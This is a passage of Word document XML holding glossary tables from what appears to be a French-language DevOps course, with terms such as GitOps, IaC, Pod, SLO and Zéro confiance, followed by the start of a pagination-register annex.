                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DORA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cadre de mesure de la performance de livraison : fréquence de déploiement, délai de livraison, taux d'échec, délai de restauration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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GitOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Gestion de l'état d'un système par un dépôt Git déclaratif, réconcilié automatiquement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IaC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Infrastructure as Code : décrire l'infrastructure dans des fichiers versionnés plutôt que par des actions manuelles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Idempotence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Propriété d'une opération qui produit le même résultat qu'elle soit exécutée une ou plusieurs fois.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ingress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Point d'entrée HTTP d'un cluster Kubernetes, qui route vers les services internes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Temps nécessaire à une requête pour aboutir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pP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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifeste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichier déclaratif décrivant l'état souhaité d'une ressource.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Observabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Capacité à comprendre l'état interne d'un système à partir de ses signaux : métriques, journaux, traces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Automatisation du déploiement, de la mise à l'échelle et de la réparation de conteneurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Enchaînement automatisé d'étapes : construction, test, analyse, publication, déploiement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plus petite unité déployable de Kubernetes, composée d'un ou plusieurs conteneurs partageant réseau et volumes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Provisionnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Création des ressources d'infrastructure : machines, réseaux, bases.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Registre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service de stockage et de distribution d'images de conteneurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Rollback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Retour à une version antérieure connue comme fonctionnelle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SLO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objectif de niveau de service, exprimé en pourcentage de réussite sur une fenêtre donnée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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SLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Indicateur mesuré qui sert à évaluer un SLO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Informations sensibles : mots de passe, clés, jetons.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Service mesh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Couche d'infrastructure gérant les communications entre services : chiffrement, retries, observabilité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sidecar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneur auxiliaire partageant le pod du conteneur principal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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SRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Site Reliability Engineering : application de l'ingénierie logicielle à l'exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pP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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>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Terme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stateless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Se dit d'un service qui ne conserve aucun état entre deux requêtes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Protocole de chiffrement des échanges réseau, à l'origine du S.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enregistrement du parcours d'une requête à travers plusieurs services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>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Versionnement sémantique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>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Convention MAJEUR.MINEUR.CORRECTIF pour les numéros de version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Zéro confiance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modèle de sécurité qui ne fait confiance à aucun réseau ni aucun utilisateur par défaut.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Annexe D — Registre de pagination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce registre est produit automatiquement lors de la fabrication du volume. Il indique la page de départ de chaque cours et des annexes dans la pagination continue.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="nil" w:sz="4" w:space="0" w:color="D5DEE6"/>
          <w:left w:val="nil" w:sz="4" w:space="0" w:color="D5DEE6"/>
          <w:bottom w:val="nil" w:sz="4" w:space="0" w:color="D5DEE6"/>
          <w:right w:val="nil" w:sz="4" w:space="0" w:color="D5DEE6"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D5DEE6"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D5DEE6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6310"/>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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
